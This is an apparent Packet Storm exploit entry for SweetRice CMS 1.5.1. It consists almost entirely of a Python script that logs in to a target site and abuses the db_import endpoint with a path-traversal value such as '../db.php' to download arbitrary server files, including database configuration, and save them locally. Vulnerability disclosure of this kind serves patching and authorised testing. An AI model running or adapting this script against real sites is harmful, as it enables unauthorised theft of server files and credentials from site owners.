SweetRice 1.5.1 Local File Inclusion

2016-11-02T00:00:00
ID PACKETSTORM:139498
Type packetstorm
Reporter Ehsan Hosseini
Modified 2016-11-02T00:00:00

Description

                                        
                                            `||#/usr/bin/python  
#-*- Coding: utf-8 -*-  
# Exploit Title: SweetRice 1.5.1 - Local File Inclusion  
# Exploit Author: Ashiyane Digital Security Team  
# Date: 03-11-2016  
# Vendor: http://www.basic-cms.org/  
# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip  
# Version: 1.5.1  
# Platform: WebApp - PHP - Mysql  
  
import requests  
import os  
from requests import session  
  
if os.name == 'nt':  
os.system('cls')  
else:  
os.system('clear')  
pass  
banner = '''  
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+  
| _________ __ __________.__ |  
| / _____/_ _ __ ____ _____/ |\______ \__| ____ ____ |  
| \_____ \\ \/ \/ // __ \_/ __ \ __\ _/ |/ ___\/ __ \ |  
| / \\ /\ ___/\ ___/| | | | \ \ \__\ ___/ |  
|/_______ / \/\_/ \___ >\___ >__| |____|_ /__|\___ >___ > |  
| \/ \/ \/ \/ \/ \/ |  
| > SweetRice 1.5.1 Local File Inclusion |  
| > Script Cod3r : Ehsan Hosseini |  
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+  
'''  
  
print(banner)  
  
  
# Get Host & User & Pass & LfiPath  
host = input("Enter The Target URL(Example : localhost.com) : ")  
username = input("Enter Username : ")  
password = input("Enter Password : ")  
lfipath = input("Enter File To Download(Example : ../db.php) : ")  
xplfile = input("Enter Name of File To Save(Example : ../db.php) : ")  
  
userinfo = {  
'user':username,  
'passwd':password,  
'rememberMe':''  
}  
  
with session() as r:  
login = r.post('http://' + host + '/as/?type=signin', data=userinfo)  
success = 'Login success'  
if login.status_code == 200:  
print("[+] Sending User&Pass...")  
if login.text.find(success) > 1:  
print("[+] Login Succssfully...")  
else:  
print("[-] User or Pass is incorrent...")  
print("Good Bye...")  
exit()  
pass  
pass  
dlfile = r.get('http://' + host +   
'/as/?type=data&mode=db_import&db_file=' + lfipath + '&form_mode=save')  
  
if dlfile.status_code == 200:  
  
print('[+] Exploit...')  
file = open(xplfile, "w")  
file.write(dlfile.text)  
file.close()  
print('[+] File Saved...')  
print('[+] Exploit By Ehsan Hosseini')  
else:  
print("[-] Error in Exploting...")  
pass ||  
  
`